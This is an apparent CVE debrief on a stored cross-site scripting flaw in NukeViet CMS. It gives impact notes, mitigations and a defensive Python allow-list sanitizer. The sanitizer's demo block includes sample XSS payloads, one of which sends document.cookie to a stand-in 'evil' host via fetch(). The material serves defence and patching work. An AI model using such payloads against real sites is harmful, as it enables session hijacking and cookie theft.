PatchSiren cyber security CVE debrief
CVE-2026-41147 nukeviet CVE debrief
NukeViet CMS versions 4.5.07 and prior contain a stored cross-site scripting (XSS) vulnerability in the Request class due to insufficient server-side input sanitization. The application relies primarily on client-side filtering to sanitize HTML tags and attributes, which can be bypassed by intercepting and modifying HTTP requests directly. An unauthenticated attacker can inject malicious payloads that are stored server-side and executed in browsers of users viewing the content, including administrators and moderators reviewing contact messages or comments. The vulnerability was demonstrated using the Contact module as a proof of concept. Potential impacts include session hijacking via cookie theft, unauthorized actions performed under victim identities, defacement, redirection to phishing pages, and phishing attacks through manipulated email notifications. The issue has been resolved in version 4.5.08.
- Vendor
- nukeviet
- Product
- NukeViet CMS
- CVSS
- HIGH 8.7
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-22
- Original CVE updated
- 2026-05-26
- Advisory published
- 2026-05-22
- Advisory updated
- 2026-05-26
Who should care
Organizations running NukeViet CMS versions 4.5.07 or earlier, particularly those with public-facing contact forms or comment functionality. Administrators and security teams responsible for web application security should prioritize patching. Developers maintaining NukeViet deployments or forks should review input handling implementations.
Technical summary
The vulnerability exists in the Request class of NukeViet CMS, which is the component through which submitted form data reaches the application. Its server-side input sanitization is insufficient, and the application instead relies on client-side filtering of HTML tags and attributes. Client-side filtering is not a security control: an attacker does not need the browser at all and can submit a raw HTTP request (for example via an intercepting proxy) containing whatever markup they like. The unsanitized payload is stored and later rendered when administrators, moderators, or other users view the affected content, at which point the injected script runs in their browser with their session. The Contact module served as the proof of concept, but the flaw is in shared request handling rather than that module alone. The fix in version 4.5.08 addresses the sanitization deficiency on the server side.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade NukeViet CMS to version 4.5.08 or later to address the stored XSS vulnerability.
- If immediate upgrade is not possible, add server-side HTML sanitization to the request-handling path so that submitted content is filtered on the server against an allow-list of permitted tags and attributes, regardless of any client-side filtering. At minimum, strip or encode iframe elements, srcdoc attributes, and inline event-handler attributes (the on* family).
- Enforce a Content Security Policy (CSP) to restrict inline script execution and reduce the impact of XSS attacks.
- Configure session cookies with the HttpOnly flag to mitigate cookie theft via XSS. Note that HttpOnly does not stop the other impacts listed above: injected script can still issue requests in the victim's authenticated session, so it is a mitigation, not a substitute for the patch.
- Review and audit user-submitted content in contact messages, comments, and other input vectors for signs of compromise.
- Implement additional server-side validation for all user input rather than relying on client-side filtering alone.
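As an added illustration of the server-side sanitization recommended above (this is example code written for this debrief, not NukeViet's own code or its Request class), the following allow-list sanitizer in Python strips every tag and attribute that is not explicitly permitted, so iframe elements, srcdoc attributes, and on* event handlers never reach the stored content. It also rejects javascript: and data: URLs in href, re-escapes text so double-encoded payloads stay inert, discards script/style bodies, and balances tags so an unclosed element cannot swallow the surrounding admin page. The allowed tag and attribute sets are assumptions chosen for a contact form or comment field; tighten them to what your templates actually need.

```python
"""Server-side allow-list HTML sanitizer for user-submitted content.

Example code for this debrief; not part of NukeViet. The allow-lists below are
assumptions for a contact/comment field, not NukeViet's configuration.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allow-list: anything not named here is dropped. iframe, script, style,
# srcdoc and every on* handler are absent, so they can never be emitted.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
RAW_TEXT_TAGS = {"script", "style"}          # bodies are discarded, not escaped
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL


def _safe_url(value: str) -> bool:
    # Browsers ignore embedded control characters, so "java\nscript:" must be
    # normalised before the scheme check or it would slip through.
    cleaned = "".join(ch for ch in value if ch.isprintable())
    return urlparse(cleaned.strip()).scheme.lower() in SAFE_SCHEMES


class AllowListSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped: list[str] = []   # audit trail, useful for logging attempts
        self._open: list[str] = []     # currently open allowed tags, for balancing
        self._in_raw = False

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._in_raw = True
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept, href_kept = [], False
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")   # on*, srcdoc, style, ...
                continue
            if name == "href":
                if not _safe_url(value):
                    self.dropped.append(f"{tag}@href={value!r}")
                    continue
                href_kept = True
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        if href_kept:
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self._in_raw = False
            return
        if tag not in self._open:        # disallowed, void, or never opened
            return
        while self._open:                # close everything up to and including it
            top = self._open.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self._in_raw:
            # convert_charrefs already decoded entities, so re-escaping here
            # keeps double-encoded payloads such as &lt;script&gt; inert.
            self.out.append(html.escape(data, quote=False))

    # Comments, <!DOCTYPE>, <?pi?> and CDATA sections are discarded outright.
    def handle_comment(self, data): self.dropped.append("comment")
    def handle_decl(self, decl): self.dropped.append("decl")
    def handle_pi(self, data): self.dropped.append("pi")
    def unknown_decl(self, data): self.dropped.append("decl")

    def result(self) -> str:
        self.close()
        while self._open:                # balance whatever the input left open
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    """Sanitize a raw request field on the server, ignoring any client-side filter."""
    parser = AllowListSanitizer()
    parser.feed(fragment)
    return parser.result()


if __name__ == "__main__":
    # Constructed sample payloads of the kinds the advisory names
    for payload in (
        '<iframe srcdoc="<script>alert(document.cookie)</script>"></iframe>',
        '<a href="javascript:alert(1)" onclick="fetch(\'//evil/\'+document.cookie)">hi</a>',
        '<p>Normal <b>message</b> with <a href="https://example.org/?a=1&b=2">a link</a></p>',
    ):
        print(repr(sanitize(payload)))
```

Apply sanitize() to the raw request body before storage and again treat stored content as untrusted at render time; the dropped list is worth logging, since an on* attribute or srcdoc arriving at the server is itself evidence that someone bypassed the client-side filter.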
Evidence notes
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, indicating network attack vector, low attack complexity, low privileges required, user interaction required, changed scope, high confidentiality and integrity impact, and no availability impact; these metrics compute to the 8.7 (HIGH) base score shown above. Note that the vector's PR:L does not match the description's "unauthenticated attacker"; a public contact form needs no account, so treat the attack as reachable without authentication when prioritizing, and regard PR:L as the conservative reading. The vulnerability status in NVD is listed as 'Deferred'.
Official resources
CVE-2026-41147 was published on 2026-05-22 and last modified on 2026-05-26. The vulnerability affects NukeViet CMS versions 4.5.07 and prior. A fix is available in version 4.5.08.